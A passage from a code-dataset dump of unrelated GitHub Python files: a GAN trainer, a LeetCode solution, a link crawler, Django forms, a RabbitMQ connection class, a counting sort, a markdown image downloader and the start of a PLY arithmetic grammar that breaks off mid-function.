directory=self.check_point_root, max_to_keep=3)
latest_checkpoint = self.check_point_manager.latest_checkpoint
if latest_checkpoint:
print("Initializing from check point : {}".format(latest_checkpoint))
self.check_point.restore(latest_checkpoint) # 从最近的检查点恢复数据
else:
print("Initializing from scratch...")
def generator_loss_fn(self, dis_fake):
return self.loss_obj(tf.ones_like(dis_fake), dis_fake)
def discriminator_loss_fn(self, dis_fake, dis_real):
loss_fake = self.loss_obj(tf.zeros_like(dis_fake), dis_fake)
loss_real = self.loss_obj(tf.ones_like(dis_real), dis_real)
return loss_fake + loss_real
def create_noise_img(self, batch):
return tf.random.normal(shape=(batch, self.latent_dim))
def show_gen_img(self):
noise = self.create_noise_img(self.batch_size)
fake_img = self.generator(noise)
plt.imshow(fake_img[0])
plt.show()
@tf.function
def train_step(self, ds):
with tf.GradientTape(persistent=True) as tape:
x_true = ds[0]
batch = x_true.shape[0] # 动态计算每次迭代的batch_size
noise = self.create_noise_img(batch)
fake_img = self.generator(noise)
dis_fake = self.discriminator(fake_img)
dis_real = self.discriminator(x_true)
loss_generator = self.generator_loss_fn(dis_fake)
loss_discriminator = self.discriminator_loss_fn(dis_fake, dis_real)
generator_grad = tape.gradient(loss_generator, self.generator.trainable_weights)
self.generator_optimizer_obj.apply_gradients(zip(generator_grad, self.generator.trainable_weights))
discriminator_grad = tape.gradient(loss_discriminator, self.discriminator.trainable_weights)
self.discriminator_optimizer_obj.apply_gradients(zip(discriminator_grad, self.discriminator.trainable_weights))
self.metrics_obj(tf.ones_like(dis_fake), dis_fake) # 评价生成的图片与1之间的差距
return loss_generator, loss_discriminator
    def train(self):
        # Full training loop: every step logs losses/accuracy to TensorBoard;
        # every `save_interval` steps it checkpoints and logs sample images.
        file_writer = tf.summary.create_file_writer(logdir=self.log_dir)
        with file_writer.as_default():
            for epoch in range(self.epochs):
                for ds in self.ds_train:
                    loss_generator, loss_discriminator = self.train_step(ds=ds)
                    acc = self.metrics_obj.result() * 100
                    step = self.check_point.step.numpy()
                    log_info = "epoch:{} ,step:{}, loss_g:{} , loss_d:{} , acc:{} % ".format(epoch, step,
                                                                                             loss_generator,
                                                                                             loss_discriminator, acc)
                    print(log_info)
                    tf.summary.scalar(name="loss_generator", data=loss_generator, step=step)
                    tf.summary.scalar(name="loss_discriminator", data=loss_discriminator, step=step)
                    tf.summary.scalar(name="acc", data=acc, step=step)
                    if step % self.save_interval == 0:
                        # Periodic checkpoint plus a grid of generated samples.
                        self.check_point_manager.save()
                        noise_img = self.create_noise_img(self.batch_size)
                        gen_img = self.generator(noise_img)
                        tf.summary.image(name="gen_img", data=gen_img, step=step, max_outputs=5)
                    self.check_point.step.assign_add(1)
        self.show_gen_img()
if __name__ == '__main__':
    # Training entry point: checkpoints and TensorBoard logs go under these paths.
    _check_point_root = "check_points/mnist_gan"
    _log_dir = "logs/gan"
    gan = Gan(epochs=10,
              latent_dim=100,
              batch_size=64,
              check_point_root=_check_point_root,
              save_interval=50,
              log_dir=_log_dir
              )
    print('Training ...')
    gan.train()
| zoomself/mnist | mnist_gan.py | mnist_gan.py | py | 7,315 | python | en | code | 0 | github-code | 13 |
class Solution(object):
    """Solution for "Contains Duplicate II" (LeetCode 219)."""

    def containsNearbyDuplicate(self, nums, k):
        """Return True if nums holds two equal values at most k indices apart.

        Keeps a sliding window of the last k elements in a set so each
        membership test is O(1); overall O(n) time, O(k) space.
        """
        if not nums:
            return False
        # Bug fix: the original used a dict literal `{}`, so `.add()` raised
        # AttributeError on the very first element.
        window = set()
        e = 0
        # Fill the initial window of (at most) k elements.
        while e < len(nums) and e < k:
            if nums[e] in window:
                return True
            window.add(nums[e])
            e += 1
        # Slide the window across the rest of the list.
        s = 0
        while e < len(nums):
            if nums[e] in window:
                return True
            window.add(nums[e])
            window.remove(nums[s])
            s += 1
            e += 1
        return False
| clovery410/mycode | leetcode/219contains_duplicate2.py | 219contains_duplicate2.py | py | 525 | python | en | code | 1 | github-code | 13 |
# Minimal crawler: fetch one page and print the target of every anchor tag.
import urllib.request,urllib.error,urllib.parse
from bs4 import BeautifulSoup
url="https://www.youtube.com/"
info=urllib.request.urlopen(url) # notice no encoding
data=info.read() # the data received is read in UTF-8 only, it's not decoded
x=BeautifulSoup(data,"html.parser") # extracts the page in html format
tags=x('a') # makes a list of anchor tags in the html document
for tag in tags:
    print(tag.get("href",None)) # extracts the href attribute from each anchor tag
# as a result we get all the links available on a particular webpage
# web-crawler pretends to be a web-browser but it can extract information about the webpage unlike a browser, for example
# here it extracts all the links available on a webpage, search engines are web-crawlers for example google, and chrome,firefox
# are web-browsers
| ishan-21/Using-Python-to-Access-Web-Data | source_codes/web_crawler.py | web_crawler.py | py | 837 | python | en | code | 0 | github-code | 13 |
71990901137 | from django import forms
from user.models import User, FileUpload
class UserForm(forms.ModelForm):
    """Model form for a User, accepting the date of birth as dd/mm/yyyy."""
    # Declared explicitly so the date is both rendered and parsed as dd/mm/yyyy.
    dob = forms.DateField(widget=forms.DateInput(format='%d/%m/%Y'),
                          input_formats=('%d/%m/%Y',))
    class Meta:
        model = User
        fields = ('name', 'fathers_name', 'dob', 'pan_image', 'pan_number')
        # NOTE(review): 'dob' is overridden by the explicit field above, so
        # this widget entry is likely ignored — confirm the datepicker class
        # actually reaches the rendered input.
        widgets = {
            'dob': forms.DateInput(attrs={'class': 'datepicker'}),
        }
class FileUploadForm(forms.ModelForm):
    """Single-field form for uploading a file to the FileUpload model."""
    class Meta:
        model = FileUpload
        fields = ('file',)
| KRT12/ocr_reader | user/forms.py | forms.py | py | 548 | python | en | code | 0 | github-code | 13 |
30290815166 | """
Connection
==========
Class that is used to manage connection and communication state.
"""
import collections
import logging
import os
import pika
from pika import spec
from rejected import errors, log, state, utils
LOGGER = logging.getLogger(__name__)
Published = collections.namedtuple(
    'Published', ['delivery_tag', 'message_id',
                  'exchange', 'routing_key', 'future'])
"""Used to keep track of published messages for delivery confirmations"""
# Event callbacks the Connection owner supplies; invoked on readiness, open
# errors, close, flow control (blocked/unblocked), confirmations and deliveries.
Callbacks = collections.namedtuple(
    'callbacks', ['on_ready', 'on_open_error',
                  'on_closed', 'on_blocked', 'on_unblocked',
                  'on_confirmation', 'on_delivery'])
class Connection(state.State):
    """Contains the connection to RabbitMQ used by
    :class:`~rejected.process.Process` and
    :class:`~rejected.consumer.Consumer`. This is an internal object, but
    is accessed in the consumer for publishing.
    """
    HB_INTERVAL = 300
    STATE_CLOSED = 0x08
    STATE_CONNECTED = 0x09
    def __init__(self, name, config, consumer_name, should_consume,
                 publisher_confirmations, io_loop, callbacks):
        """Create the connection state holder and immediately start connecting.

        :param str name: Logical name for this connection
        :param dict config: Connection settings (host, port, credentials, ...)
        :param str consumer_name: Used (with the PID) to build the consumer tag
        :param bool should_consume: Whether this connection should consume
        :param bool publisher_confirmations: Enable publisher confirmations
        :param io_loop: The Tornado IOLoop the connection runs on
        :param Callbacks callbacks: Event callbacks invoked on state changes
        """
        super(Connection, self).__init__()
        self.blocked = False
        self.callbacks = callbacks
        self.channel = None
        self.config = config
        self.correlation_id = None
        self.delivery_tag = 0
        self.should_consume = should_consume
        self.consumer_tag = '{}-{}-{}'.format(name, consumer_name, os.getpid())
        self.io_loop = io_loop
        self.last_confirmation = 0
        self.logger = log.CorrelationIDAdapter(LOGGER, {'parent': self})
        self.name = name
        self.published_messages = []
        self.publisher_confirmations = publisher_confirmations
        self.handle = None
        self.connect()
        # Set specific state values
        self.STATES[0x08] = 'CLOSED'
        self.STATES[0x09] = 'CONNECTED'
    @property
    def is_closed(self):
        """Returns ``True`` if the connection is closed.
        :rtype: bool
        """
        return self.is_stopped
    @property
    def is_connected(self):
        """Returns ``True`` if the connection is open
        :rtype: bool
        """
        return self.state in [self.STATE_ACTIVE, self.STATE_CONNECTED]
    def add_confirmation_future(self, exchange, routing_key, properties,
                                future):
        """Invoked by :class:`~rejected.consumer.Consumer` when publisher
        confirmations are enabled, containing a stack of futures to finish,
        by delivery tag, when RabbitMQ confirms the delivery.
        :param str exchange: The exchange the message was published to
        :param str routing_key: The routing key that was used
        :param properties: AMQP message properties of published message
        :type properties: pika.spec.Basic.Properties
        :param tornado.concurrent.Future future: The future to resolve
        """
        self.delivery_tag += 1
        self.published_messages.append(
            Published(self.delivery_tag, properties.message_id, exchange,
                      routing_key, future))
    def clear_confirmation_futures(self):
        """Invoked by :class:`~rejected.consumer.Consumer` when process has
        finished and publisher confirmations are enabled.
        """
        self.published_messages = []
    def connect(self):
        """Create the low-level AMQP connection to RabbitMQ and store it on
        ``self.handle``; completion is reported via on_open/on_open_error.
        """
        self.set_state(self.STATE_CONNECTING)
        self.handle = pika.TornadoConnection(
            self._connection_parameters,
            on_open_callback=self.on_open,
            on_open_error_callback=self.on_open_error,
            stop_ioloop_on_close=False,
            custom_ioloop=self.io_loop)
    def reset(self):
        """Reset channel/confirmation bookkeeping after the connection closes."""
        self.channel = None
        self.handle = None
        self.correlation_id = None
        self.published_messages = []
        self.delivery_tag = 0
        self.last_confirmation = 0
        self.set_state(self.STATE_CLOSED)
    def shutdown(self):
        """Start the connection shutdown process, cancelling any active
        consuming and closing the channel if the connection is not active.
        """
        if self.is_shutting_down:
            self.logger.debug('Already shutting down')
            return
        self.set_state(self.STATE_SHUTTING_DOWN)
        self.logger.debug('Shutting down connection')
        if not self.is_active:
            return self.channel.close()
        self.logger.debug('Sending a Basic.Cancel to RabbitMQ')
        self.channel.basic_cancel(self.on_consumer_cancelled,
                                  self.consumer_tag)
    def on_open(self, _handle):
        """Invoked when the connection is opened
        :type _handle: pika.adapters.tornado_connection.TornadoConnection
        """
        self.logger.debug('Connection opened')
        self.handle.add_on_connection_blocked_callback(self.on_blocked)
        self.handle.add_on_connection_unblocked_callback(self.on_unblocked)
        self.handle.add_on_close_callback(self.on_closed)
        self.handle.channel(self.on_channel_open)
    def on_open_error(self, *args, **kwargs):
        """Invoked when the connection to RabbitMQ could not be opened;
        notifies the owner through the ``on_open_error`` callback.
        """
        self.logger.error('Connection failure %r %r', args, kwargs)
        self.set_state(self.STATE_CLOSED)
        self.callbacks.on_open_error(self.name)
    def on_closed(self, _connection, reply_code, reply_text):
        """Invoked when the connection closes; resets local state and notifies
        the owner through the ``on_closed`` callback.
        """
        self.set_state(self.STATE_CLOSED)
        self.logger.debug('Connection closed (%s) %s', reply_code, reply_text)
        self.reset()
        self.callbacks.on_closed(self.name)
    def on_blocked(self, frame):
        """Invoked when RabbitMQ blocks the connection (flow control)."""
        self.logger.warning('Connection blocked: %r', frame)
        self.blocked = True
        self.callbacks.on_blocked(self.name)
    def on_unblocked(self, frame):
        """Invoked when RabbitMQ unblocks a previously blocked connection."""
        self.logger.warning('Connection unblocked: %r', frame)
        self.blocked = False
        self.callbacks.on_unblocked(self.name)
    def on_channel_open(self, channel):
        """This method is invoked by pika when the channel has been opened. It
        will change the state to CONNECTED, add the callbacks and setup the
        channel to start consuming.
        :param pika.channel.Channel channel: The channel object
        """
        self.logger.debug('Channel opened')
        self.set_state(self.STATE_CONNECTED)
        self.channel = channel
        self.channel.add_on_close_callback(self.on_channel_closed)
        self.channel.add_on_cancel_callback(self.on_consumer_cancelled)
        if self.publisher_confirmations:
            self.delivery_tag = 0
            self.channel.confirm_delivery(self.on_confirmation)
            self.channel.add_on_return_callback(self.on_return)
        self.callbacks.on_ready(self.name)
    def on_channel_closed(self, _channel, reply_code, reply_text):
        """Invoked by pika when RabbitMQ unexpectedly closes the channel.
        Channels are usually closed if you attempt to do something that
        violates the protocol, such as re-declare an exchange or queue with
        different parameters. In this case, we'll close the connection
        to shutdown the object.
        :param pika.channel.Channel _channel: The AMQP Channel
        :param int reply_code: The AMQP reply code
        :param str reply_text: The AMQP reply text
        """
        self.logger.warning('Channel was closed: (%s) %s - %s',
                            reply_code, reply_text, self.state_description)
        # Non-4xx closes are treated as fatal for this connection.
        if not (400 <= reply_code <= 499):
            self.set_state(self.STATE_CLOSED)
            return
        if self.is_shutting_down:
            self.logger.debug('Closing connection')
            self.handle.close()
            return
        # Soft (4xx) error: reopen a channel and surface the failure either by
        # raising or by failing the oldest pending publish confirmation.
        self.set_state(self.STATE_CONNECTING)
        self.handle.channel(self.on_channel_open)
        pending = self.pending_confirmations()
        if not pending:
            raise errors.RabbitMQException(self.name, reply_code, reply_text)
        pending[0][1].future.set_exception(
            errors.RabbitMQException(self.name, reply_code, reply_text))
    def consume(self, queue_name, no_ack, prefetch_count):
        """Consume messages from RabbitMQ, changing the state, QoS and issuing
        the RPC to RabbitMQ to start delivering messages.
        :param str queue_name: The name of the queue to consume from
        :param False no_ack: Enable no-ack mode
        :param int prefetch_count: The number of messages to prefetch
        """
        if self.state == self.STATE_ACTIVE:
            self.logger.debug('%s already consuming', self.name)
            return
        self.set_state(self.STATE_ACTIVE)
        self.channel.basic_qos(self.on_qos_set, 0, prefetch_count, False)
        self.channel.basic_consume(
            consumer_callback=self.on_delivery, queue=queue_name,
            no_ack=no_ack, consumer_tag=self.consumer_tag)
    def on_qos_set(self, frame):
        """Invoked by pika when the QoS is set
        :param pika.frame.Frame frame: The QoS Frame
        """
        self.logger.debug('QoS was set: %r', frame)
    def on_consumer_cancelled(self, _frame):
        """Invoked by pika when a ``Basic.Cancel`` or ``Basic.CancelOk``
        is received.
        :param _frame: The Basic.Cancel or Basic.CancelOk frame
        :type _frame: pika.frame.Frame
        """
        self.logger.debug('Consumer has been cancelled')
        if self.is_shutting_down:
            self.channel.close()
        else:
            self.set_state(self.STATE_CONNECTED)
    def on_confirmation(self, frame):
        """Invoked by pika when RabbitMQ responds to a Basic.Publish RPC
        command, passing in either a Basic.Ack or Basic.Nack frame with
        the delivery tag of the message that was published. The delivery tag
        is an integer counter indicating the message number that was sent
        on the channel via Basic.Publish.
        :param pika.frame.Method frame: Basic.Ack or Basic.Nack frame
        """
        delivered = frame.method.NAME.split('.')[1].lower() == 'ack'
        self.logger.debug('Received publisher confirmation (Delivered: %s)',
                          delivered)
        # A "multiple" confirmation covers every tag up to delivery_tag.
        if frame.method.multiple:
            for index in range(self.last_confirmation + 1,
                               frame.method.delivery_tag):
                self.confirm_delivery(index, delivered)
        self.confirm_delivery(frame.method.delivery_tag, delivered)
        self.last_confirmation = frame.method.delivery_tag
    def confirm_delivery(self, delivery_tag, delivered):
        """Invoked by RabbitMQ when it is confirming delivery via a Basic.Ack
        :param int delivery_tag: The message # being confirmed
        :param bool delivered: Was the message delivered
        """
        for offset, msg in self.pending_confirmations():
            if delivery_tag == msg.delivery_tag:
                self.published_messages[offset].future.set_result(delivered)
                return
        # Already-resolved futures (e.g. via on_return) are silently accepted.
        for msg in self.published_messages:
            if msg.delivery_tag == delivery_tag and msg.future.done():
                return
        self.logger.warning('Attempted to confirm publish without future: %r',
                            delivery_tag)
    def on_delivery(self, channel, method, properties, body):
        """Invoked by pika when RabbitMQ delivers a message from a queue.
        :param channel: The channel the message was delivered on
        :type channel: pika.channel.Channel
        :param method: The AMQP method frame
        :type method: pika.frame.Frame
        :param properties: The AMQP message properties
        :type properties: pika.spec.Basic.Properties
        :param bytes body: The message body
        """
        self.callbacks.on_delivery(
            self.name, channel, method, properties, body)
    def on_return(self, channel, method, properties, body):
        """Invoked by RabbitMQ when it returns a message that was published.
        :param channel: The channel the message was delivered on
        :type channel: pika.channel.Channel
        :param method: The AMQP method frame
        :type method: pika.frame.Frame
        :param properties: The AMQP message properties
        :type properties: pika.spec.Basic.Properties
        :param bytes body: The message body
        """
        pending = self.pending_confirmations()
        if not pending:  # Exit early if there are no pending messages
            self.logger.warning('RabbitMQ returned message %s and no pending '
                                'messages are unconfirmed',
                                utils.message_info(method.exchange,
                                                   method.routing_key,
                                                   properties))
            return
        self.logger.warning('RabbitMQ returned message %s: (%s) %s',
                            utils.message_info(method.exchange,
                                               method.routing_key, properties),
                            method.reply_code, method.reply_text)
        # Try and match the exact message or first message published that
        # matches the exchange and routing key
        for offset, msg in pending:
            if (msg.message_id == properties.message_id or
                    (msg.exchange == method.exchange and
                     msg.routing_key == method.routing_key)):
                self.published_messages[offset].future.set_result(False)
                return
        # Handle the case where we only can go on message ordering
        self.published_messages[0].future.set_result(False)
    def pending_confirmations(self):
        """Return all published messages that have yet to be acked, nacked, or
        returned.
        :return: [(int, Published)]
        """
        return sorted([(idx, msg)
                       for idx, msg in enumerate(self.published_messages)
                       if not msg.future.done()],
                      key=lambda x: x[1].delivery_tag)
    @property
    def _connection_parameters(self):
        """Return connection parameters for a pika connection.
        :rtype: pika.ConnectionParameters
        """
        return pika.ConnectionParameters(
            self.config.get('host', 'localhost'),
            self.config.get('port', 5672),
            self.config.get('vhost', '/'),
            pika.PlainCredentials(
                self.config.get('user', 'guest'),
                self.config.get('password', self.config.get('pass', 'guest'))),
            ssl=self.config.get('ssl', False),
            frame_max=self.config.get('frame_max', spec.FRAME_MAX_SIZE),
            socket_timeout=self.config.get('socket_timeout', 10),
            heartbeat_interval=self.config.get(
                'heartbeat_interval', self.HB_INTERVAL))
| code-fabriek/rejected | rejected/connection.py | connection.py | py | 14,925 | python | en | code | null | github-code | 13 |
5311986178 | import utils
import os
from PIL import Image
from matplotlib import pyplot as plt
import numpy as np
import crypto
def get_spikes_for_letter_for_noise(letter, noise_level):
    """Load all test images of `letter` at the given noise level and convert
    each to a spike train.

    Images live under <dataset root>/<letter>/test/, with the noise level
    embedded in the file name as "_<level>_".
    """
    spike_trains = []
    noise_string = "_" + str(noise_level) + "_"
    folder = '/Users/mihailplesa/Documents/Doctorat/Research/Dataset/' + letter + '/test/'
    for filename in os.listdir(folder):
        # endswith() instead of the original substring test: `'.png' in filename`
        # also matched names that merely contain ".png" in the middle.
        if filename.endswith('.png') and noise_string in filename:
            img = Image.open(os.path.join(folder, filename))
            if img is not None:
                spike_trains.append(utils.spike_train_from_image(img))
    return spike_trains
def get_network_output_var_for_letter(network, std_output, spike_train, load):
    # Run the network on one spike train and return the Euclidean distance
    # between its output and the letter's reference (standard) output.
    t = network.run_network(spike_train, False, 0, load=load)
    letter_output = network.get_output(t)
    print(letter_output)  # debug trace of the raw network output
    return np.linalg.norm(np.asarray(std_output) - np.asarray(letter_output))
def get_network_privacy_output_for_letter(network, privacy):
    # Run the network in privacy (encrypted-input) mode and return its raw output.
    t = network.run_network(privacy=privacy)
    letter_output = network.get_output(t)
    return letter_output
def get_network_privacy_var_for_letter(std_output, encrypted_output, private_key):
    # Decrypt each output value, then measure its Euclidean distance to the
    # letter's reference (standard) output.
    decrypted_output = [crypto.private_decrypt(ciphertext, private_key) for ciphertext in encrypted_output]
    return np.linalg.norm(np.asarray(std_output) - np.asarray(decrypted_output))
def get_accuracy_for_letter_for_noise(trained_networks, std_outputs, true_letter, noise_level, load):
    """Classify every noisy test image of `true_letter` and return accuracy.

    Each spike train is scored against the per-letter networks ('a'..'z');
    the letter whose network output is closest to its reference wins.
    """
    spike_trains = get_spikes_for_letter_for_noise(true_letter, noise_level)
    if not spike_trains:
        # Guard: the original divided by len(spike_trains) and raised
        # ZeroDivisionError when no test images matched.
        return 0.0
    acc = 0
    for spike_train in spike_trains:
        # best_var instead of shadowing the builtin `min`.
        best_var = get_network_output_var_for_letter(trained_networks['a'], std_outputs['a'], spike_train, load)
        ans_letter = 'a'
        for letter in range(98, 123):  # 'b' .. 'z'
            print('Test ', str(chr(letter)))
            var = get_network_output_var_for_letter(trained_networks[str(chr(letter))], std_outputs[str(chr(letter))], spike_train, load)
            if var < best_var:
                best_var = var
                ans_letter = str(chr(letter))
        if ans_letter == true_letter:
            acc = acc + 1
    return acc / len(spike_trains)
def get_accuracy_over_encrypted(trained_networks, std_outputs, true_letter, noise_level, public_key, private_key):
    """Accuracy over encrypted inputs.

    Spike trains are encrypted with `public_key`, the networks run in privacy
    mode, and outputs are decrypted with `private_key` for distance scoring.
    """
    spike_trains = get_spikes_for_letter_for_noise(true_letter, noise_level)
    if not spike_trains:
        # Guard: the original divided by len(spike_trains) and raised
        # ZeroDivisionError when no test images matched.
        return 0.0
    acc = 0
    zero_encryption = crypto.public_encryption(0, public_key)
    for spike_train in spike_trains:
        encrypted_spike_train = [crypto.public_encryption(int(spike), public_key) for spike in spike_train]
        privacy = (encrypted_spike_train, zero_encryption)
        encrypted_outputs = get_network_privacy_output_for_letter(trained_networks['a'], privacy)
        # best_var instead of shadowing the builtin `min`.
        best_var = get_network_privacy_var_for_letter(std_outputs['a'], encrypted_outputs, private_key)
        ans_letter = 'a'
        for letter in range(98, 123):  # 'b' .. 'z'
            print('Test ', str(chr(letter)))
            encrypted_outputs = get_network_privacy_output_for_letter(trained_networks[str(chr(letter))], privacy)
            var = get_network_privacy_var_for_letter(std_outputs[str(chr(letter))], encrypted_outputs, private_key)
            if var < best_var:
                best_var = var
                ans_letter = str(chr(letter))
        if ans_letter == true_letter:
            acc = acc + 1
    return acc / len(spike_trains)
| miiip/Privacy-Presering-Spiking-Neural-P-System | test.py | test.py | py | 3,367 | python | en | code | 0 | github-code | 13 |
import sys
input = sys.stdin.readline  # rebind to the faster reader (competitive-programming idiom)
# R x C grid with M moving entries; each entry: row r, col c, speed s,
# direction d, size z, stored in a dict keyed by 0-based (row, col).
R, C, M = map(int, input().split())
arr = {}
# Period of a full down-and-back (resp. right-and-back) bounce along an axis.
m_r = int((R-1)*2)
m_c = int((C-1)*2)
result = 0
for _ in range(M):
    r,c,s,d,z = map(int, input().split())
    arr[(r-1,c-1)]=[s,d,z]
def next_arr(arr, p):
    # Advance the simulation one step while the catcher stands at column p:
    # remove (and score) the top-most entry in column p, then move everything.
    new_fish_index = {}
    global m_r, m_c, R, result
    # Catch: the entry nearest the top of column p is removed; its size (z)
    # is added to the global result.
    for i in range(R):
        if (i,p) in arr:
            result+=arr[(i,p)][2]
            del arr[(i,p)]
            break
    for key, value in arr.items():
        if value[1]<3:
            # Vertical movement (directions 1/2). Positions bounce off the
            # edges with period m_r, so the travel is reduced modulo m_r.
            d = 2
            idx = 0
            if m_r>0:
                if value[1] == 2:
                    idx = (key[0] + value[0]) % m_r
                else:
                    idx = (m_r + value[0] - key[0]) % m_r
                if idx>m_r-idx:
                    # Reflected past the far edge: flip direction.
                    d = 1
                    idx = m_r - idx
            new_idx = (idx,key[1])
            value[1] = d
            # On collision, only the larger entry (by size z) survives.
            if new_idx in new_fish_index:
                if value[2]>new_fish_index[new_idx][2]:
                    new_fish_index[new_idx] = value
            else:
                new_fish_index[new_idx] = value
        else:
            # Horizontal movement (directions 3/4), symmetric to the above.
            d = 3
            idx = 0
            if m_c>0:
                if value[1] == 3:
                    idx = (key[1] + value[0]) % m_c
                else:
                    idx = (m_c + value[0] - key[1]) % m_c
                if idx>m_c-idx:
                    d = 4
                    idx = m_c - idx
            new_idx = (key[0],idx)
            value[1] = d
            if new_idx in new_fish_index:
                if value[2]>new_fish_index[new_idx][2]:
                    new_fish_index[new_idx] = value
            else:
                new_fish_index[new_idx] = value
    #print_data(new_fish_index)
    return new_fish_index
def print_data(fish_data):
    # Debug helper: render the position dict as an R x C grid of sizes.
    global R,C
    arr = [[0]*C for i in range(R)]
    for key,value in fish_data.items():
        arr[key[0]][key[1]] = value[2]
    for _ in arr:
        print(_)
    print()
# Sweep the catcher across every column; `result` accumulates the caught sizes.
for i in range(C):
    arr = next_arr(arr,i)
print(result)
16641994577 | import sys
import threadpool
import mistletoe
from bs4 import BeautifulSoup
import httpx
import os
import re
def download_pics(url, file, img_name):
    """Download the image at `url` into an assets directory beside `file`.

    The bytes are written to <dir of file>/(unknown).assets/<img_name>.
    """
    img_data = httpx.get(url).content
    dirname = os.path.dirname(file)
    # NOTE(review): this f-string contains no placeholder; it looks like the
    # directory name was meant to incorporate the markdown file's base name —
    # confirm against download_and_replace_image, which builds the relative
    # link from the markdown file name.
    targer_dir = os.path.join(dirname, f'(unknown).assets')
    if not os.path.exists(targer_dir):
        os.mkdir(targer_dir)
    # Bug fix: write in binary mode. The original opened the file in text
    # mode ('w+') and reached into f.buffer to write bytes.
    with open(os.path.join(targer_dir, img_name), 'wb') as f:
        f.write(img_data)
def download_and_replace_image(filepath: str):
    """Rewrite one markdown file: download each remote image to a local assets
    folder and rewrite/remove its markdown image reference.
    """
    url_suffix = 'https://upload-images.jianshu.io/upload_images/'
    print(f'正在处理文件:{filepath}')
    print(filepath)
    with open(filepath, 'r', encoding='utf-8') as f:
        file_content = f.read()
    # Render to HTML so BeautifulSoup can enumerate the <img> tags.
    html = mistletoe.markdown(file_content)
    soup = BeautifulSoup(html, features='html.parser')
    for img in soup.find_all('img'):
        img_url: str = img.get('src')
        if not img_url.startswith('http://') and not img_url.startswith('https://'):
            print(f'不是有效的网络图片链接,跳过')
            # Bug fix: the original `return` aborted the whole file on the
            # first non-network image and never wrote the rewritten content;
            # skip just this image instead.
            continue
        img_base_name = os.path.basename(img_url.replace(url_suffix, '').replace('?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240', ''))
        print(f'下载图片:{img_base_name}')
        img_name = img_base_name
        if '.' not in img_base_name:
            # No extension on the remote name: default to .png
            img_name = img_base_name + '.png'
        download_pics(img_url, filepath, img_name)
        img_relative_path = os.path.join(os.path.basename(filepath).replace('.md', '.assets'), img_name)
        print(f'替换图片链接:{img_url} with {img_relative_path}')
        # Replace the markdown image syntax with an asset tag, then strip it.
        # NOTE(review): the second replace erases the tag entirely instead of
        # substituting img_relative_path — confirm this is intentional.
        file_content = re.sub(f"!\\[.*?\\]\\((.*?){img_base_name}(.*?)\\)", f'{{% assets {img_base_name} %}}', file_content)
        file_content = file_content.replace(f'{{% assets {img_base_name} %}}', f'')
    updated_file_content = file_content
    with open(filepath, 'w+', encoding='utf-8') as f:
        print(f'改动写入文件:{filepath}')
        f.write(updated_file_content)
def run(_path:str):
    # Collect every .md file under _path and process them on a 4-worker
    # thread pool via download_and_replace_image.
    print('正在处理。')
    # work_path = os.path.join('.', 'docs')
    work_path = _path
    pool = threadpool.ThreadPool(4)
    args = []
    for root, dirs, files in os.walk(work_path):
        for filename in files:
            if filename.endswith('md'):
                filepath = os.path.abspath(os.path.join(root, filename))
                args.append(filepath)
                # download_and_replace_image(filepath)
    tasks = threadpool.makeRequests(download_and_replace_image, args)
    [pool.putRequest(task) for task in tasks]
    print('=> 线程池开始运行')
    pool.wait()
    print('任务完成。')
if __name__ == '__main__':
    # CLI entry: first argument is the directory of markdown files to process.
    run(sys.argv[1])
# Hand-coding practice (5) - counting sort
# Counting sort: count the occurrences of each value, turn the counts into a
# prefix sum of positions, then place each element at its counted position.
# Time complexity - O(n + k) / k = max number of array
# Space complexity - O(k) / an extra output array is needed to hold the result.
def counting_sort(arr):
    """Sort a list of non-negative integers with counting sort.

    O(n + k) time and O(k) extra space, where k is the maximum value.
    Returns a new sorted list; `arr` is not modified.
    """
    if not arr:
        # Guard: the original called max() on an empty list and raised.
        return []
    max_num = max(arr)
    count = [0] * (max_num + 1)
    for num in arr:
        count[num] += 1
    # Prefix sums: count[v] becomes the number of elements <= v.
    for i in range(1, max_num + 1):
        count[i] += count[i - 1]
    answer = [0] * len(arr)
    # Walk the input backwards so equal elements keep their order (stable).
    for num in reversed(arr):
        count[num] -= 1
        answer[count[num]] = num
    return answer
print(counting_sort([1, 2, 4, 5, 5, 6, 2, 7, 7, 4, 10, 22, 2, 3, 4]))  # demo run
70835720658 | # ------------------------------------------------------------
# File: Operations.py
# Developed by: Erick Barrantes, Jessica Espinoza
# Project: FunSkills-Compiler
# version: 1
#
# Last modified 26 /10 /19
# Description: Grammar for mathematical operations
#
# TEC 2019 | CE3104 - Lenguajes, Compiladores e Interpretes
# -------------------------------------------------------------
import sys
import src.ide.globals as globals
funcList = []  # NOTE(review): appears unused in this module — confirm before removing
variables = {}  # symbol table: name -> stored value(s); see p_factor_ID / p_factor_array
# PLY operator-precedence table (lowest first within each associativity row).
precedence = (
    ('left', 'PLUS', 'MINUS'),
    ('left', 'TIMES', 'DIVIDE'),
    ('right', 'NEGATIVE'),  # Unary minus operator
)
# NOTE(review): the multiplication rule below uses a token named MULT while
# this table lists TIMES — confirm the token names match the lexer, otherwise
# that precedence entry has no effect.
# Basic operations
def p_expression_plus(p):
    'expression : expression PLUS term'
    # Addition; left-associative through the grammar's left recursion.
    p[0] = p[1] + p[3]
def p_expression_minus(p):
    'expression : expression MINUS term'
    # Subtraction; left-associative through the grammar's left recursion.
    p[0] = p[1] - p[3]
def p_term_times(p):
    'term : term MULT factor'
    # Multiplication; note the token here is named MULT, not TIMES.
    p[0] = p[1] * p[3]
def p_term_div(p):
    'term : term DIVIDE factor'
    # True division; a ZeroDivisionError propagates to the parser's caller.
    p[0] = p[1] / p[3]
def p_expression_negative(p):
    'expression : MINUS term %prec NEGATIVE'
    # Unary minus, given NEGATIVE precedence (highest row in the table).
    p[0] = -p[2]
# Basic atomic expressions
def p_expression_term(p):
    'expression : term'
    # Promotion: a lone term is a valid expression.
    p[0] = p[1]
def p_term_factor(p):
    'term : factor'
    # Promotion: a lone factor is a valid term.
    p[0] = p[1]
def p_factor_num(p):
    'factor : NUMBER'
    # Numeric literal evaluates to its token value.
    p[0] = p[1]
def p_factor_ID(p):
    'factor : ID'
    # Variable reference: look up the most recent value bound to the name.
    try:
        if isinstance(variables[p[1]][-1], int):
            p[0] = variables[p[1]][-1]
        else:
            print("'" + p[1] + "'", "must be integer")
            # Consistency fix: fall back to 0 (as the undeclared-name branch
            # does) so p[0] is never left as None for the arithmetic rules.
            p[0] = 0
    except KeyError:
        print("Syntactic Error: Variable %s has not been declared." % p[1])
        p[0] = 0
def p_factor_array(p):
    'factor : ID LBRACKET NUMBER RBRACKET'
    # Array element reference: ID[NUMBER].
    # Bug fix: the original indexed `variables[p[1]]` directly in the
    # condition, so an undeclared name raised KeyError instead of printing
